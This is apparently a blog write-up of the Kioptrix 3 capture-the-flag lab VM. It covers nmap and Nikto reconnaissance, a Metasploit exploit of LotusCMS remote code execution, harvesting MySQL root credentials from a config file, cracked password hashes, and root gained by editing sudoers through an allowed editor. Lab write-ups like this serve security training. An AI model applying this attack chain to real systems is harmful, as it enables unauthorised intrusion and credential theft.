Kioptrix 3 Write-up

This has been some long time I haven’t written another write-up. This one’s for Kioptrix 3 that you can find here.

Host Discovery

$ nmap -sP 192.168.56.1/24

and we got the IP address : 192.168.56.101.

As it was explained, you need to add 192.168.56.101 kioptrix3.com in your /etc/hosts.

Fingerprinting

Then, let’s find what kind of services are running on the host machine.

$ nmap 192.168.56.101 -sV -A 

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-12 20:15 CEST
Nmap scan report for malicious (192.168.56.101)
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
title = "kioptrix 3 write up"
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds

Quite obvious, let’s check this Web server !

Reconnaissance

Thanks to Nikto, we managed to find useful informations:

(...)
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
(...)

And with DirBuster:

(...)
Dir found: /gallery/ - 500
File found: /gallery/index.php - 500
File found: /gallery/recent.php - 500
Dir found: /gallery/p.php/ - 500
Dir found: /gallery/g.php/ - 500
Dir found: /gallery/themes/ - 200
(...)

Moreover, by navigating on the website, I managed to get the CMS behind:

<meta name="keywords" content="LotusCMS" />

Exploitation

Thanks to this information, I looked on Exploit-db for some known vulnerabilities.

Bingo, there was. :-)

I ran metasploit and exploited this eval() Remote Command Execution. I managed to get a (limited) meterpreter session on the machine, and retrieved different files on the filesystem such as configuration file gconfig.php:

<?php
    error_reporting(0);
    /*
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.
    */

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as http://www.yoursite.com/gallery
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

    // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
        echo("A connection to the database couldn't be established: " . mysql_error());
        die();
}else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
        die();
    }else {
        $settings=mysql_query("select * from gallarific_settings");
        if(mysql_num_rows($settings)!=0){
            while($data=mysql_fetch_array($settings)){
                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
            }
        }
    
    }
}

?>

Thanks to those credentials, I managed to access the phpMyAdmin and dumped all databases.

I got different hashes:

dreg:0d3eccfb887aabd50f243b3f155c0f85 => Mast3r
loneferret:5badcaf789d3d1d09794d8f021f40f0e => starwars

Moreover, I had the admin’s password: n0t7t1k4.

I managed to log in with loneferret’s credentials on the SSH service.

I checked the files which were in the home folder and I found CompanyPolicy.README:

$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

And then:

$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

Thanks to this, I only had to edit the /etc/sudoers file and update the entry:

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash

Back to the terminal:

loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:~#

and Voilà, I was able to access the file /root/Congrats.txt.

Nice VM it was a fun trick with ht command.